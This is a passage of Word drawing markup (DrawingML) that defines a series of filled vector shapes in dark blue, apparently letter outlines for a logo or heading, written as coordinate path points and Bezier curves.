                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27343" y="66353"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="19495" y="66353"/>
                                  <a:pt x="12967" y="63990"/>
                                  <a:pt x="7785" y="59279"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2591" y="54567"/>
                                  <a:pt x="0" y="48293"/>
                                  <a:pt x="0" y="40470"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="30793"/>
                                  <a:pt x="3124" y="21966"/>
                                  <a:pt x="9385" y="13977"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13170" y="9120"/>
                                  <a:pt x="17488" y="5475"/>
                                  <a:pt x="22341" y="3045"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="3584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22" name="Shape 122"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4700077" y="331171"/>
                            <a:ext cx="48870" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="48870" h="67081">
                                <a:moveTo>
                                  <a:pt x="35725" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="40272" y="0"/>
                                  <a:pt x="44653" y="1092"/>
                                  <a:pt x="48870" y="3277"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="42697" y="18414"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39332" y="16522"/>
                                  <a:pt x="36208" y="15570"/>
                                  <a:pt x="33312" y="15570"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="30518" y="15570"/>
                                  <a:pt x="28156" y="16243"/>
                                  <a:pt x="26213" y="17576"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24270" y="18910"/>
                                  <a:pt x="22746" y="21336"/>
                                  <a:pt x="21628" y="24841"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20523" y="28333"/>
                                  <a:pt x="19965" y="35661"/>
                                  <a:pt x="19965" y="46825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19965" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18542" y="10820"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21717" y="6414"/>
                                  <a:pt x="24562" y="3505"/>
                                  <a:pt x="27102" y="2108"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29629" y="711"/>
                                  <a:pt x="32512" y="0"/>
                                  <a:pt x="35725" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="123" name="Shape 123"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4481510" y="331171"/>
                            <a:ext cx="110947" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="110947" h="67081">
                                <a:moveTo>
                                  <a:pt x="41910" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="46736" y="0"/>
                                  <a:pt x="50927" y="876"/>
                                  <a:pt x="54483" y="2603"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="58026" y="4331"/>
                                  <a:pt x="60947" y="6947"/>
                                  <a:pt x="63208" y="10439"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="66523" y="6947"/>
                                  <a:pt x="70104" y="4331"/>
                                  <a:pt x="73939" y="2603"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="77775" y="876"/>
                                  <a:pt x="81877" y="0"/>
                                  <a:pt x="86233" y="0"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="91770" y="0"/>
                                  <a:pt x="96457" y="977"/>
                                  <a:pt x="100292" y="2933"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="104127" y="4890"/>
                                  <a:pt x="106997" y="7772"/>
                                  <a:pt x="108890" y="11557"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="110261" y="14351"/>
                                  <a:pt x="110947" y="18885"/>
                                  <a:pt x="110947" y="25146"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="110947" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90983" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90983" y="29590"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="90983" y="23089"/>
                                  <a:pt x="90297" y="18885"/>
                                  <a:pt x="88925" y="16993"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="87084" y="14515"/>
                                  <a:pt x="84239" y="13284"/>
                                  <a:pt x="80404" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="77610" y="13284"/>
                                  <a:pt x="74981" y="14021"/>
                                  <a:pt x="72517" y="15506"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="70053" y="16993"/>
                                  <a:pt x="68275" y="19164"/>
                                  <a:pt x="67196" y="22022"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="66103" y="24892"/>
                                  <a:pt x="65557" y="29401"/>
                                  <a:pt x="65557" y="35585"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="65557" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45593" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="45593" y="31140"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="45593" y="24752"/>
                                  <a:pt x="45250" y="20638"/>
                                  <a:pt x="44539" y="18783"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="43828" y="16929"/>
                                  <a:pt x="42723" y="15545"/>
                                  <a:pt x="41237" y="14643"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="39738" y="13741"/>
                                  <a:pt x="37719" y="13284"/>
                                  <a:pt x="35154" y="13284"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32080" y="13284"/>
                                  <a:pt x="29312" y="14008"/>
                                  <a:pt x="26848" y="15443"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24384" y="16890"/>
                                  <a:pt x="22619" y="18974"/>
                                  <a:pt x="21552" y="21679"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20485" y="24397"/>
                                  <a:pt x="19964" y="28905"/>
                                  <a:pt x="19964" y="35216"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19964" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67081"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18390" y="1486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18390" y="10439"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="24981" y="3480"/>
                                  <a:pt x="32817" y="0"/>
                                  <a:pt x="41910" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="124" name="Shape 124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4430393" y="331171"/>
                            <a:ext cx="37389" cy="67118"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37389" h="67118">
                                <a:moveTo>
                                  <a:pt x="1308" y="0"/>
                                </a:moveTo>
                                <a:cubicBezTo>
                                  <a:pt x="10211" y="0"/>
                                  <a:pt x="16840" y="927"/>
                                  <a:pt x="21196" y="2756"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25552" y="4584"/>
                                  <a:pt x="28626" y="6908"/>
                                  <a:pt x="30404" y="9728"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32169" y="12560"/>
                                  <a:pt x="33058" y="17729"/>
                                  <a:pt x="33058" y="25273"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="32855" y="45529"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32855" y="51295"/>
                                  <a:pt x="33172" y="55537"/>
                                  <a:pt x="33807" y="58280"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34442" y="61023"/>
                                  <a:pt x="35649" y="63957"/>
                                  <a:pt x="37389" y="67081"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="17653" y="67081"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="17132" y="65925"/>
                                  <a:pt x="16485" y="64224"/>
                                  <a:pt x="15735" y="61950"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15405" y="60922"/>
                                  <a:pt x="15164" y="60249"/>
                                  <a:pt x="15024" y="59919"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11608" y="62801"/>
                                  <a:pt x="7963" y="64960"/>
                                  <a:pt x="4089" y="66408"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="67118"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="55625"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7925" y="53251"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10338" y="51676"/>
                                  <a:pt x="11925" y="49771"/>
                                  <a:pt x="12674" y="47498"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="13195" y="46024"/>
                                  <a:pt x="13462" y="43205"/>
                                  <a:pt x="13462" y="39039"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="35585"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="10897" y="36322"/>
                                  <a:pt x="6858" y="37211"/>
                                  <a:pt x="1308" y="38240"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="38604"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27236"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="24282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13462" y="22555"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="13462" y="19215"/>
                                  <a:pt x="12509" y="16840"/>
                                  <a:pt x="10617" y="15418"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="13305"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1308"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25" name="Shape 125"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4749086" y="309492"/>
                            <a:ext cx="44463" cy="90246"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="44463" h="90246">
                                <a:moveTo>
                                  <a:pt x="29185" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42825" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42825" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185" y="63436"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="29185" y="68796"/>
                                  <a:pt x="29324" y="71907"/>
                                  <a:pt x="29578" y="72796"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="29845" y="73685"/>
                                  <a:pt x="30429" y="74409"/>
                                  <a:pt x="31356" y="74981"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="32283" y="75565"/>
                                  <a:pt x="33401" y="75857"/>
                                  <a:pt x="34722" y="75857"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="36576" y="75857"/>
                                  <a:pt x="39256" y="75299"/>
                                  <a:pt x="42748" y="74181"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="44463" y="87643"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="39815" y="89383"/>
                                  <a:pt x="34557" y="90246"/>
                                  <a:pt x="28689" y="90246"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25095" y="90246"/>
                                  <a:pt x="21844" y="89713"/>
                                  <a:pt x="18961" y="88671"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="16066" y="87618"/>
                                  <a:pt x="13957" y="86258"/>
                                  <a:pt x="12598" y="84595"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="11252" y="82918"/>
                                  <a:pt x="10313" y="80671"/>
                                  <a:pt x="9792" y="77826"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9373" y="75806"/>
                                  <a:pt x="9157" y="71730"/>
                                  <a:pt x="9157" y="65596"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="37008"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="23165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9157" y="10135"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="29185"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26" name="Shape 126"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4970663" y="308155"/>
                            <a:ext cx="62548" cy="114743"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="62548" h="114743">
                                <a:moveTo>
                                  <a:pt x="62548" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="62548" y="11399"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="39891" y="16133"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="30963" y="20679"/>
                                  <a:pt x="24231" y="27093"/>
                                  <a:pt x="19710" y="35347"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15189" y="43603"/>
                                  <a:pt x="12929" y="52201"/>
                                  <a:pt x="12929" y="61129"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="12929" y="69816"/>
                                  <a:pt x="15456" y="77728"/>
                                  <a:pt x="20498" y="84853"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="25540" y="91977"/>
                                  <a:pt x="32614" y="97172"/>
                                  <a:pt x="41732" y="100448"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="62548" y="103709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="62548" y="114743"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33668" y="109834"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="22314" y="105236"/>
                                  <a:pt x="13856" y="98467"/>
                                  <a:pt x="8318" y="89513"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2769" y="80560"/>
                                  <a:pt x="0" y="70807"/>
                                  <a:pt x="0" y="60265"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="48695"/>
                                  <a:pt x="3150" y="37913"/>
                                  <a:pt x="9449" y="27931"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="15748" y="17949"/>
                                  <a:pt x="24371" y="10456"/>
                                  <a:pt x="35306" y="5452"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="62548"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27" name="Shape 127"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4806020" y="307701"/>
                            <a:ext cx="68681" cy="90551"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68681" h="90551">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="33300"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="26391" y="26746"/>
                                  <a:pt x="34087" y="23470"/>
                                  <a:pt x="43040" y="23470"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="47638" y="23470"/>
                                  <a:pt x="51778" y="24219"/>
                                  <a:pt x="55474" y="25705"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="59169" y="27178"/>
                                  <a:pt x="61950" y="29070"/>
                                  <a:pt x="63817" y="31382"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="65684" y="33693"/>
                                  <a:pt x="66967" y="36246"/>
                                  <a:pt x="67653" y="39039"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="68339" y="41834"/>
                                  <a:pt x="68681" y="46190"/>
                                  <a:pt x="68681" y="52070"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="68681" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48717" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="48717" y="55905"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="48717" y="49022"/>
                                  <a:pt x="48349" y="44665"/>
                                  <a:pt x="47587" y="42811"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="46825" y="40957"/>
                                  <a:pt x="45491" y="39484"/>
                                  <a:pt x="43574" y="38392"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41656" y="37300"/>
                                  <a:pt x="39256" y="36754"/>
                                  <a:pt x="36360" y="36754"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="33045" y="36754"/>
                                  <a:pt x="30086" y="37452"/>
                                  <a:pt x="27483" y="38850"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="24879" y="40259"/>
                                  <a:pt x="22974" y="42367"/>
                                  <a:pt x="21768" y="45186"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20561" y="48006"/>
                                  <a:pt x="19951" y="52172"/>
                                  <a:pt x="19951" y="57696"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19951" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="90551"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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28" name="Shape 128"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5033211" y="397084"/>
                            <a:ext cx="74473" cy="27787"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="74473" h="27787">
                                <a:moveTo>
                                  <a:pt x="59347" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="74473" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="69736" y="8356"/>
                                  <a:pt x="62471" y="14897"/>
                                  <a:pt x="52667" y="19634"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="41440" y="25070"/>
                                  <a:pt x="27762" y="27787"/>
                                  <a:pt x="11608" y="27787"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="25814"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="14780"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10477" y="16421"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="21793" y="16421"/>
                                  <a:pt x="31521" y="15049"/>
                                  <a:pt x="39662" y="12319"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="47815" y="9575"/>
                                  <a:pt x="54369" y="5473"/>
                                  <a:pt x="59347" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="101600"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="1E487A"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="129" name="Shape 129"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5198628" y="332657"/>
                            <a:ext cx="112433" cy="65595"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="112433" h="65595">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19380" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33515" y="42989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="46520" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65761" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="78334" y="42989"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="92761" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="112433" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="88214" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="69037" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56032" y="23406"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="43256" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23863" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="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30" name="Shape 130"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5119609" y="332657"/>
                            <a:ext cx="68606" cy="67081"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="68606" h="67081">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="19952" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19952" y="30137"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="19952" y="39370"/>
                                  <a:pt x="20320" y="45021"/>
                                  <a:pt x="21057" y="47091"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21793" y="49175"/>
                                  <a:pt x="23127" y="50826"/>
                                  <a:pt x="25070" y="52044"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="27013" y="53251"/>
                                  <a:pt x="29477" y="53860"/>
                                  <a:pt x="32461" y="53860"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="35865" y="53860"/>
                                  <a:pt x="38926" y="53047"/>
                                  <a:pt x="41618" y="51422"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="44323" y="49796"/>
                                  <a:pt x="46165" y="47777"/>
                                  <a:pt x="47155" y="45364"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="48158" y="42964"/>
                                  <a:pt x="48654" y="37058"/>
                                  <a:pt x="48654" y="27674"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="48654" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="68606" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="65595"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50076" y="55778"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="47320" y="59271"/>
                                  <a:pt x="43714" y="62039"/>
                                  <a:pt x="39243" y="64046"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="34760" y="66065"/>
                                  <a:pt x="30049" y="67081"/>
                                  <a:pt x="25070" y="67081"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="20003" y="67081"/>
                                  <a:pt x="15456" y="66116"/>
                                  <a:pt x="11430" y="64173"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="7404" y="62242"/>
                                  <a:pt x="4496" y="59524"/>
                                  <a:pt x="2692" y="56019"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="902" y="52527"/>
                                  <a:pt x="0" y="47688"/>
                                  <a:pt x="0" y="41504"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="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31" name="Shape 131"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5447789" y="331171"/>
                            <a:ext cx="37078" cy="68567"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="37078" h="68567">
                                <a:moveTo>
                                  <a:pt x="31826" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="37078" y="2195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37078" y="13287"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37071" y="13284"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="32347" y="13284"/>
                                  <a:pt x="28372" y="14922"/>
                                  <a:pt x="25184" y="18199"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="21984" y="21463"/>
                                  <a:pt x="20384" y="26352"/>
                                  <a:pt x="20384" y="32868"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
